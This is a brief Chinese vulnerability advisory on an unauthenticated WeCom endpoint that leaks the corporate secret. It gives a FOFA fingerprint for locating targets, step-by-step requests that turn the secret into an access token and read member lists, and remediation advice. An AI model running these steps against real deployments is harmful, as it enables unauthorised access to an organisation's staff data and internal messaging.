1 漏洞简介
企业微信xxx.com/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内力量发送钓鱼文件和链接等风险
2 fofa指纹
app="Tencent-企业微信"
3 复现过程
3.1 获取Secret、strcorpid
xxx.com/cgi-bin/gateway/agentinfo
3.2 获取token
xxx.com/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret
strcorpid、Secret 为3.1获取的值
3.3 带入token请求功能接口
举例:获取标签成员
xxx.com/cgi-bin/user/list?access_token=access_token
access_token为3.2获取的值
更多功能情况访问
4 修复意见
- 更新至最新版本
- 临时处理:在waf上添加 /cgi-bin.gateway/agentinfo 规则阻拦